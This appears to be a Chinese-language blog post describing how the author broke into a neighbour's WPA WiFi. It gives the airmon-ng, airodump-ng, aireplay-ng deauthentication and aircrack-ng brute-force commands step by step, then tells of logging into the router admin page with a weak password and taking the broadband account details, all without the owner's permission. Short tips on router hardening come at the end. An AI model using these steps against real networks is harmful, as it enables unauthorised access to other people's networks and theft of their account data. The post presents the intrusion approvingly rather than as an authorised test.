隔壁黑客上線了-記一次WIFI破解實戰
打開電腦後順手打開了網路設置
村裡窮能搜到WIFI真是不容易,看到這多少有點興奮,起碼有點希望了,然後祭出神器kali。
下面為破解WIFI的正常步驟,由於本次實戰沒有具體的截圖這裡部分引用了先前發在博客的WPA-PSK無線網路的破解 內的部分圖片,此篇文章也引自那篇筆記。
1.首先開啟網卡的監聽模式
airmon-ng start wlan0
在開啟監聽模式後網卡會被重新命名為wlan0mon (kali2.0之前的版本會重命名為 mon)
2.掃描附近無線情況。
airodump-ng wlan0mon
3.抓取握手包
airodump-ng --bssid 78:A3:51:12:A6:A8 -c 1 -w wifi wlan0mon
參數說明: --bssid 目標AP MAC
-c 目標AP所在信道-w 握手包保存的文件名
4. 使用DEAUTH攻擊使已經連接的客戶端斷開並重新連接,以產生握手包
aireplay-ng -0 0 -a 78:A3:51:12:A6:A8 -c 84:73:03:A2:82:67 wlan0mon
參數解釋: -0 Deautenticate攻擊模式 0代表無限次
-a 目標ap的mac
-c 攻擊者網卡mac發起攻擊後我們可以看到客戶端的幀(Frames)迅速增加當看到 WPA handshake 時 證明已經成功抓取到握手包
5.跑包aircrack-ng -w /root/Desktop/pwd.txt wif.cap
這次在沒有任何信息的情況下我只能通過暴力破解的方法 不過運氣不錯 密碼並不複雜 看了會電視密碼就出來了
根據這個密碼 可以猜測到路由器管理密碼也不會太複雜果然 123456789成功登錄路由器後台,同時也拿到了寬頻的相關信息。
如果後台的確使用了較為複雜的密碼,可以https://zhuanlan.zhihu.com/p/20871363根據這篇文章也可以拿到路由器管理許可權。
WIFI已經成為現代人生活中不可缺少的部分,但是目前的情況來看,無線安全仍然存在較大的問題,近期由於無線所引發的問題也越來越多,對於不信任的WIFI千萬不要隨便連接,如果你一旦進入攻擊者的區域網內,你的所有隱私將不會再是隱私。
無線網路引發內網滲透:https://zhuanlan.zhihu.com/p/21373655?refer=sss95zz,這篇文章的入口就是WIFI,導致整個內網暴露在攻擊者的手下。
對於個人路由器的建議:
1.加強無線密碼強度,純8位數字組合超過1億 純9位數字組合超過10億 如果加入大小寫字母 特殊字元 這個組合將成數倍增加,所以一個高強度的密碼是路由器防護的第一道牆。
2.開啟MAC白名單制,路由器的白名單可以直接丟棄非白名單內的連接。
3.定期查看連接列表,對於不信任的MAC加入黑名單。
以上幾點僅能在一定程度上將強安全,但是沒有絕對的安全,在複雜的密碼只要有時間也會跑出來,白名單黑名單可以通過偽造MAC地址繞過,所以網路安全必須時時警惕。
蹭網、冒雨 30分鐘寫的,因為不知道什麼時候鄰居就會拔網線,有錯見諒!
推薦閱讀:
※隔壁不光蹭網,還無恥的把我家的無線設備都拉黑了,怎麼教訓回敬一下?
※為什麼蘋果提示不廣播SSID會暴露個人信息,並建議用戶到路由器上設置為廣播SSID?
TAG:无线网络安全 |